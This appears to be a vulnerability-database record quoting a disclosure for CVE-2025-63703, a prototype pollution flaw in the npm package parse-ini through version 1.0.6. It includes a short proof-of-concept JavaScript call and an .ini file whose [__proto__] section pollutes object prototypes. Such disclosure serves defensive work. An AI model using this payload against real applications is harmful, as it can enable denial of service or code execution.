{"uuid": "830b981a-e156-4360-88a1-ca32e1c54074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63703", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-63703\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype  pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n>\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}